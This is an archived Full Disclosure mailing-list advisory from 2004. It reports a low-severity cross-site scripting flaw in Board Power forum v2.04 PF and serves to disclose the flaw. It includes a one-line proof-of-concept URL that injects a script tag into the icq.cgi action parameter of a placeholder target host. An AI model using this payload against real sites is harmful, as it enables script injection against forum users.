Full Disclosure mailing list archives

XSS in Board Power forum


From: "Alexander Antipov" <antipov () SecurityLab ru>
Date: Thu, 15 Jul 2004 09:45:45 +0400

Programm: Board Power forum v2.04 PF
Autor: Ivan Zhdanov
CRITICAL: Low
Exploit: 
http://target/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert
('hello');</script>
URL: http://www.thewebmasterforums.com 
......
Maxpatrol - Professional Network Security Scanner (www.maxpatrol.com).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: